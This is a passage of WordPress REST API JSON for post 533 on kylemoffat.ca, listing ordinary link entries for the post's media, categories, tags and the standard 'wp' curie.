ent":[{"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/media?parent=533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/categories?post=533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kylemoffat.ca\/index.php\/wp-json\/wp\/v2\/tags?post=533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}